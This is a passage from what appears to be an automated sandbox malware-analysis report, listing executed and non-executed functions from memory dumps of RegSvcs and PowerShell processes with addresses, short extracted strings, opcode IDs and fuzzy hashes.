Instruction Fuzzy Hash: 5BF0F871D402098ECB80EFB8EA022EEBBB4AB44201F148166D919E3214E7345A65CBD1

Function 06D49B1D Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8f3106b9814c79c9c8843d8244741966b79d2c478380690de408b42703da40
Instruction ID: 3336db246544e0698855bf4117216be2f3f82943893c47496d46cfac38222114
Opcode Fuzzy Hash: 0d8f3106b9814c79c9c8843d8244741966b79d2c478380690de408b42703da40
Instruction Fuzzy Hash: 1AF06DB080024ADFCB01DF64C4859AF7FB0EF49310F10829AE555AB261D730D941CFD1

Function 06D46720 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34635736b4316e075e410c0575c58117b4eeef9c9554600f8609d7bd1dccca5d
Instruction ID: da314d6305bc6c57ebf798b8dacddfda3bc5016953fb43a6c256ae7455589322
Opcode Fuzzy Hash: 34635736b4316e075e410c0575c58117b4eeef9c9554600f8609d7bd1dccca5d
Instruction Fuzzy Hash: 5CE02637E202A243E72027A8E0147B537C9DB41320F040077D10E8BF80C5A4CC1247E0

Function 06D4A0A0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ac7bc2a2c24d9d6d721f92e624a1af6efc21d6bea6c29dbd2027e0570c15d21
Instruction ID: 7245df431805f8de4ce57bb0af2072436230cd62b743592aea37b5adbcb6b5c5
Opcode Fuzzy Hash: 9ac7bc2a2c24d9d6d721f92e624a1af6efc21d6bea6c29dbd2027e0570c15d21
Instruction Fuzzy Hash: 46F01E71C0021D8FCB80EFB8D8016EEBBF8AF09200F10812AD959E7214E7349A54CBD1

Function 06D45223 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e007c3348475d67d667718d011fd488c88485d42105429ed529f15ee2af33eed
Instruction ID: 6de2932c740c7ee4d2c8a82dfe1c09505c9022a5fed1308dc53a603d9ac77477
Opcode Fuzzy Hash: e007c3348475d67d667718d011fd488c88485d42105429ed529f15ee2af33eed
Instruction Fuzzy Hash: 40E08C73919744AFCB02AFA4AD408EABF38EE5221170002ABF58196052DA21966CD7B1

Function 06D475B8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff437b2687880c4b141601753736c3ad3803780a1612aa8409e209ab4b01dc38
Instruction ID: 4cc2905493784891e8a7c5ec8d693a8ab88ee1f0d93a552110ba221a0dfd661a
Opcode Fuzzy Hash: ff437b2687880c4b141601753736c3ad3803780a1612aa8409e209ab4b01dc38
Instruction Fuzzy Hash: 1BD01735710520CBC6085B2EE808C5AF7EFEFC9A2131940AAF50AC3321CEB5DC028794

Function 06D4A3B3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef1013f03be946fb43e51ab2e7a4f9d3a8d10fe9e363206dc63747a0a1639d86
Instruction ID: eee75d8e33084f3afc69d5f63ed5cd3427fe37172607fc4b16ed1f618163ee12
Opcode Fuzzy Hash: ef1013f03be946fb43e51ab2e7a4f9d3a8d10fe9e363206dc63747a0a1639d86
Instruction Fuzzy Hash: F3E0923098570ADFDB80FFA0C0096AEBBF0AF49300F18095DE441AB240DB744EC5CB81

Function 06D4C8F9 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f81f6ff7f9a49afa160234c15d899b8d096a751cde69e11acd6993587f61ca83
Instruction ID: faee01d2505c38b89bc0f6a74d9f7c55c7f31bbb18bdc870ecc1affec6a628f3
Opcode Fuzzy Hash: f81f6ff7f9a49afa160234c15d899b8d096a751cde69e11acd6993587f61ca83
Instruction Fuzzy Hash: EDE0C2723005708BD711AA18E4044ED3B879F84752318423AE102D2F80CB258C028B88

Function 06D4900B Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd123695c926c0f207cc6472c199de43798b9a6cb821ca41a1d2ccb5ea00a27a
Instruction ID: eea847c11aace6cc96dbc5f0a10c05c3e1c5ca0700039be02f3325071ea48a1e
Opcode Fuzzy Hash: cd123695c926c0f207cc6472c199de43798b9a6cb821ca41a1d2ccb5ea00a27a
Instruction Fuzzy Hash: F5D01776721060AF86049A5DE4448AABBAAEFC962232540AAE149C7322CA61DC43C791

Function 06D49010 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29731f90ed0276067ccd11478b81e86eaaa2c8c42e405db060b376812242933d
Instruction ID: eb9b87c7c45a459388d8f38636a42268ec49aeb537ad32d364d470a6550d1cf6
Opcode Fuzzy Hash: 29731f90ed0276067ccd11478b81e86eaaa2c8c42e405db060b376812242933d
Instruction Fuzzy Hash: 67D01732710124AF86049A1EE40486ABBAEEFC962132540AAE109C7322CE61EC428790

Function 06D44DD6 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 510245e59d1a38b4ba519b3a4f3e1396432f0106c719404095e265acf94710a1
Instruction ID: 43d81b506105d0fb19dcda2a1d844112da4badf4fcb447e05c2527fbf061072e
Opcode Fuzzy Hash: 510245e59d1a38b4ba519b3a4f3e1396432f0106c719404095e265acf94710a1
Instruction Fuzzy Hash: E5D0C97054120EDFE714EF90C159BAEBBB0FF04308F200418D002AA251CBBA8E84CBD1

Function 06D46575 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1980998316.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d94a3bdc71b263617dc2d2a7dcb0054da67d6f731db8f9a93167045c3589176
Instruction ID: 4950595654a57fd8be6f78ca8ea66422e92453a5ff8325b9e1e7260adf2c0f5c
Opcode Fuzzy Hash: 3d94a3bdc71b263617dc2d2a7dcb0054da67d6f731db8f9a93167045c3589176
Instruction Fuzzy Hash: D9C002308211058FDF10AF18F746B9577A1B741309F015996E0064756DDB78A488CB45

Non-executed Functions

Function 06D18318 Relevance: 10.3, Strings: 8, Instructions: 308COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D1855C
$^q, xrefs: 06D18531
$^q, xrefs: 06D18568
$^q, xrefs: 06D1853D
$^q, xrefs: 06D18592
$^q, xrefs: 06D1859E
$^q, xrefs: 06D184E2
$^q, xrefs: 06D184D6

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: c76ad6ae7880b807b024c1e3c28571ff82ccbe8ed6caddbecd8e4883f4cd41c9
Instruction ID: 9df0203aae27c97a3e982451f194b94bfd8445c962bed463773ee2d4b7524ddf
Opcode Fuzzy Hash: c76ad6ae7880b807b024c1e3c28571ff82ccbe8ed6caddbecd8e4883f4cd41c9
Instruction Fuzzy Hash: 67B18E70E01209AFEB64EB69E95476EBBB6EF84700F208529D4029F354DFB49C45DB90

Function 06D1CFC0 Relevance: 7.7, Strings: 6, Instructions: 197COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D1D133
$^q, xrefs: 06D1D19B
$^q, xrefs: 06D1D13F
$^q, xrefs: 06D1D167
$^q, xrefs: 06D1D1A7
$^q, xrefs: 06D1D173

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: c0cb10eb275ee7bd8b977a3f7e50d0c7622796edb12f3449a88961d6e1ad9ebf
Instruction ID: ac7cda7ebb9e2893e1d471770b783659597ab7bd3f1f59d440015c1db3d0d4ab
Opcode Fuzzy Hash: c0cb10eb275ee7bd8b977a3f7e50d0c7622796edb12f3449a88961d6e1ad9ebf
Instruction Fuzzy Hash: EC716C30E00209AFDB68DFA8E94466DB7F3EF84700B108569D4059F354DBB1E986CB81

Function 06D10040 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D1029A
$^q, xrefs: 06D102A6
$^q, xrefs: 06D102FF
$^q, xrefs: 06D1030B

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 448f1f045b8c061460ec36c53e557a5669efab7c3f5562ffe1d887638da9e33d
Instruction ID: 3a986e5a6828e5b1e5ac4e0191db79f6ae698722554690badbff1efa30af120e
Opcode Fuzzy Hash: 448f1f045b8c061460ec36c53e557a5669efab7c3f5562ffe1d887638da9e33d
Instruction Fuzzy Hash: 08B12B30A01209DFDB64EFA9D594A6EB7B2FF88304F248429D4059B395DFB5DC86CB80

Function 06D12DC0 Relevance: 5.2, Strings: 4, Instructions: 231COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D12E77
$^q, xrefs: 06D12E30
$^q, xrefs: 06D12E3C
$^q, xrefs: 06D12E6B

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 74cf23e02bf7ac04fef3ed4ef394ac167094ae53168a2b7c7e560962c7919b38
Instruction ID: a128287aad93f416adcee8aa7503e9365b3028a3a697112f25d755e6c5cd6e92
Opcode Fuzzy Hash: 74cf23e02bf7ac04fef3ed4ef394ac167094ae53168a2b7c7e560962c7919b38
Instruction Fuzzy Hash: F1914F30B0021A9FDB54DB69D9507AEB3F6EBC8304F108569C809EB354EEB1DD868B95

Function 06D10458 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D104D7
LR^q, xrefs: 06D1059A
LR^q, xrefs: 06D1054B
$^q, xrefs: 06D104E3

Memory Dump Source

Source File: 00000003.00000002.1980543244.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d10000_RegSvcs.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: 9a3519ec6add3d7ce87c31be20a6502152ac0b138ce7a50c6217920e4ed3f481
Instruction ID: da84e2a9873ed7a4baa6f0b9e2e08e6021f2c00769ad93d6c58c63f5371408e3
Opcode Fuzzy Hash: 9a3519ec6add3d7ce87c31be20a6502152ac0b138ce7a50c6217920e4ed3f481
Instruction Fuzzy Hash: 81518230B002059FDB54EB28E994A6EB7A6FF88700F14856DE4059F3A9DF71EC85CB91

Analysis Process: powershell.exePID: 6192, Parent PID: 6648COMMON

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 0345B490 Relevance: 4.0, Strings: 3, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{Ufo^, xrefs: 0345B738, 0345B73D
kUfo^, xrefs: 0345B770, 0345B775
[fo^, xrefs: 0345B529

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID: kUfo^${Ufo^$[fo^
API String ID: 0-1056273902
Opcode ID: ffc05951c6ce0c11d94d05b6d8d5651c3ae8abcc4ff4ffeceb23a217242392de
Instruction ID: 2d17c60efd4e2af8597c0c3a4f40b2d118a04856b48a30a83df0c55cfcd7b33c
Opcode Fuzzy Hash: ffc05951c6ce0c11d94d05b6d8d5651c3ae8abcc4ff4ffeceb23a217242392de
Instruction Fuzzy Hash: 889164B6F007595BDB1AEBB4C4146AEB7E3DF84604B00891DE54AAF340DF746D0A8BC6

Function 0345B4A0 Relevance: 4.0, Strings: 3, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{Ufo^, xrefs: 0345B738, 0345B73D
kUfo^, xrefs: 0345B770, 0345B775
[fo^, xrefs: 0345B529

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID: kUfo^${Ufo^$[fo^
API String ID: 0-1056273902
Opcode ID: 4daec9d0e25bed106174081825be99536c679b4e8cda5adb6c4b008c2a9a286b
Instruction ID: 59cece25b886effd7980c95b1fd29beba3b3c992800802e6fa3f51af581bcb75
Opcode Fuzzy Hash: 4daec9d0e25bed106174081825be99536c679b4e8cda5adb6c4b008c2a9a286b
Instruction Fuzzy Hash: B49164B5F007595BDB1AEBB4C4146AEB7E3EF84604B00892DD54AAF340DF746D0A8BC6

Function 079B2308 Relevance: 13.1, Strings: 10, Instructions: 641COMMON

Download Yara Rule

Strings

J0l, xrefs: 079B23D1
J0l, xrefs: 079B237F
r/l, xrefs: 079B254F
J0l, xrefs: 079B25F6
r/l, xrefs: 079B2559
4'^q, xrefs: 079B2619
4'^q, xrefs: 079B260D
J0l, xrefs: 079B23C5
J0l, xrefs: 079B25EA
J0l, xrefs: 079B259E

Memory Dump Source

Source File: 00000004.00000002.1699179275.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$J0l$J0l$J0l$J0l$J0l$J0l$r/l$r/l
API String ID: 0-2209822685
Opcode ID: b83bdc196d00ebe912e722960a44c53ad7322856cbe8dded1a649467902fcb6b
Instruction ID: d225f01eb71d97ff6248b81dc17afadedd91a92280052e9944aa96b08824322a
Opcode Fuzzy Hash: b83bdc196d00ebe912e722960a44c53ad7322856cbe8dded1a649467902fcb6b
Instruction Fuzzy Hash: D42239B1B4020ADFCB319F6886416EABBEAFF89314F04847AD905CF251DB71D945C7A2

Function 079B3CE8 Relevance: 5.6, Strings: 4, Instructions: 583
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 079B4026
4'^q, xrefs: 079B4030
4'^q, xrefs: 079B418A
4'^q, xrefs: 079B4180

Memory Dump Source

Source File: 00000004.00000002.1699179275.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 6dee771d4d7ff5154e88fef384a13825a11cf7704a96df75cc9ae960f0697a81
Instruction ID: b66d36fac85157763f30ef1e35a06eac5833de5e3b7c7c78b30302a7b4736bd2
Opcode Fuzzy Hash: 6dee771d4d7ff5154e88fef384a13825a11cf7704a96df75cc9ae960f0697a81
Instruction Fuzzy Hash: F0125CB1B003499FCB258B68DA016ABBBB6DFD1214F14847AD905CF362DB71D886C7A1

Function 079B17B8 Relevance: 2.8, Strings: 2, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%l, xrefs: 079B193A
%l, xrefs: 079B192C

Memory Dump Source

Source File: 00000004.00000002.1699179275.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79b0000_powershell.jbxd

Similarity

API ID:
String ID: %l$%l
API String ID: 0-4014842113
Opcode ID: d82b5db4a0518340f550e8515a39ebac84e7610709a29fd2840e3a898b2ec232
Instruction ID: fcdfb470d1c99797530ae1b8fb74ec83b3ff0948103c68d4ad778c203bf7598b
Opcode Fuzzy Hash: d82b5db4a0518340f550e8515a39ebac84e7610709a29fd2840e3a898b2ec232
Instruction Fuzzy Hash: D7B188B1B8024DDFCB248B7DD6106EAFBEAAF85214F18C47AD505CB251DB31D845C7A1

Function 089F715A Relevance: 1.6, APIs: 1, Instructions: 52
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE ref: 089F71C2

Memory Dump Source

Source File: 00000004.00000002.1700725919.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_89f0000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: a67be5fd21f4973db5aafeaa07da720eef92da26a96cf63e8ae827bde3c0663e
Instruction ID: 62d0223b2134e75b28698769b6b1e880063e7ec181c3783ca390f97499f46f3e
Opcode Fuzzy Hash: a67be5fd21f4973db5aafeaa07da720eef92da26a96cf63e8ae827bde3c0663e
Instruction Fuzzy Hash: E21116B5A002489FCB10DF99D584ADEFFF4AB48324F248469E559A7310C7B4A944CFA0

Function 089F7160 Relevance: 1.5, APIs: 1, Instructions: 48
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE ref: 089F71C2

Memory Dump Source

Source File: 00000004.00000002.1700725919.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_89f0000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: 322c5a49629940a663ef05ec7a1f6f78a4882fbad46217d5c707c9647a1f7d9b
Instruction ID: 6d4ce0022725ee59d93c730eb57875f8f134b88aa88a82cba28276b4e5fb7a78
Opcode Fuzzy Hash: 322c5a49629940a663ef05ec7a1f6f78a4882fbad46217d5c707c9647a1f7d9b
Instruction Fuzzy Hash: 261125B19002488FCB10DF9AD984BDEFBF8EB48324F248429D558A7310C774A944CFA0

Function 0345E5C1 Relevance: 1.4, Strings: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

J0l, xrefs: 0345E6EA

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID: J0l
API String ID: 0-3440382688
Opcode ID: eff7f771eaac34e6493d8513d0ce18507e83f5b48a67e53336316c4ac2ea325c
Instruction ID: 26f8dc7ab136c108cddc87986376e658db06cf2d11b243e4363af399910350d4
Opcode Fuzzy Hash: eff7f771eaac34e6493d8513d0ce18507e83f5b48a67e53336316c4ac2ea325c
Instruction Fuzzy Hash: 58419C75E043099FCB15EF69E9946DDFBB2EF49304F00816AE815AB391CB34AD49CB90

Function 03456FE0 Relevance: 1.4, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 03457105

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: e33865b4232fefcb11feae3a00e8c5fea515e46a52ad40a6474eb61d5a9dac1a
Instruction ID: 5287a4c72d30b66131ef4d25ac759a5976e3284eba39f0a7b5844c90c9365a81
Opcode Fuzzy Hash: e33865b4232fefcb11feae3a00e8c5fea515e46a52ad40a6474eb61d5a9dac1a
Instruction Fuzzy Hash: 4E415E35B042058FCB15DF69C498AAEBBF6EF8D714F1840A9E806AB395CB35DC01CB64

Function 0345AFA8 Relevance: 1.3, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(&^q, xrefs: 0345AFCA

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID: (&^q
API String ID: 0-2067289071
Opcode ID: 1c28c17fc2540eca03b5e096b661429312aa0fc412d7e41de46c423abc273ec9
Instruction ID: 02e3d02ed6353c011cc73cad31bddeeb55555b4b899930dc073b4879f8831b2b
Opcode Fuzzy Hash: 1c28c17fc2540eca03b5e096b661429312aa0fc412d7e41de46c423abc273ec9
Instruction Fuzzy Hash: 2821D176E042588FCB14DFAED40479EBBF5EB88320F14846AE418EB340CB7498058FA4

Function 034529F0 Relevance: .2, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0abfe4d5336bed43e456adbfff93e8b9a1494e9ff7014d993d759f8ddefe503f
Instruction ID: 4eef787d2b49a67ea1630e39dc554690d3c6b2b29db9ef7cd5df6a9f124a0c23
Opcode Fuzzy Hash: 0abfe4d5336bed43e456adbfff93e8b9a1494e9ff7014d993d759f8ddefe503f
Instruction Fuzzy Hash: 0F917B70E006458FCB15CF59C5949AEFBB1FF48310B24899AE815AB366C736FC51CBA4

Function 03457740 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78d23044e1f32a9117192b8eddadeb70a3ffa0436a868a834dfafed75f9a7ce
Instruction ID: 2c80c2ac60fb23d3a1a07a1adee44a6b8e252d936e760479addf4c764fbbfd6d
Opcode Fuzzy Hash: c78d23044e1f32a9117192b8eddadeb70a3ffa0436a868a834dfafed75f9a7ce
Instruction Fuzzy Hash: 7151B2347042019FD705DB79E844A6BBBEAEF88214B1545BAE909DF352DB35EC02C794

Function 0345BAD0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4dcfb734f36b0807393580ecaabed1af1efde2570c52eb54eee2717e036f200
Instruction ID: b60c1ed5f490ac9011e0adbeba479afd0e8abb966cb53cd7d9190ed558b96c5c
Opcode Fuzzy Hash: f4dcfb734f36b0807393580ecaabed1af1efde2570c52eb54eee2717e036f200
Instruction Fuzzy Hash: 72611571E003489FCB15DFA9D584A9DFBF5EF88310F18816AE819AB365DB309C45CB54

Function 0345BAC0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36bf1397c10454c1b7916bfd6c3ab4af5a224a85ba0d2a91f8913e988f3f6922
Instruction ID: f5e3f78416df63734a02de4f9d7e36f8d2b69de519d8ae0ef418ec3506907e41
Opcode Fuzzy Hash: 36bf1397c10454c1b7916bfd6c3ab4af5a224a85ba0d2a91f8913e988f3f6922
Instruction Fuzzy Hash: EA5122B1E00248DFCB15CFA9D584A9DFBF6FF88310F18806AE819AB365DB349845CB54

Function 079B3CCC Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1699179275.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f8d515abc9fbe9f0d2c6afa39fe49ee5026d0bb148ae1e6ea618bf7525c44db
Instruction ID: 22a728f1ac53dd2d0e1d3599261ca8f9a3c75d366ce53ce03d6ca82fcc78a2ea
Opcode Fuzzy Hash: 4f8d515abc9fbe9f0d2c6afa39fe49ee5026d0bb148ae1e6ea618bf7525c44db
Instruction Fuzzy Hash: 884119F0A003069FCB31CF68CA417EABBAAEF81708F54846AD9019F251D735E885C7A1

Function 0345E423 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 631d459c5d6b7f487aea533002e45e51567130b2fbaccca3aac246e984f226ca
Instruction ID: 0875047b674b767299c12bdca8f31688d533336f77b508455ba59b0ef24ee1c5
Opcode Fuzzy Hash: 631d459c5d6b7f487aea533002e45e51567130b2fbaccca3aac246e984f226ca
Instruction Fuzzy Hash: 5F418374B003058FCB10DF6CC59496ABBE6EF89314B1584AAF959CF366EB34DD418B90

Function 0345E430 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1694115828.0000000003450000.00000040.00000800.00020000.00000000.sdmp, Offset: 03450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc38fb78a448e335162aadcb6faefab3c72b1385d107e4c6e943d8da03729a72
Instruction ID: 1027b125589dbc4837c7ab3863317c96a700572ea36d35da019cd6e17d8607c4
Opcode Fuzzy Hash: bc38fb78a448e335162aadcb6faefab3c72b1385d107e4c6e943d8da03729a72
Instruction Fuzzy Hash: D2413374B003058FCB10DFACC69496ABBE6EF88314B1584A9F949DF366EB34DD418B51

Function 03456FB0 Relevance: .1, Instructions: 126COMMON
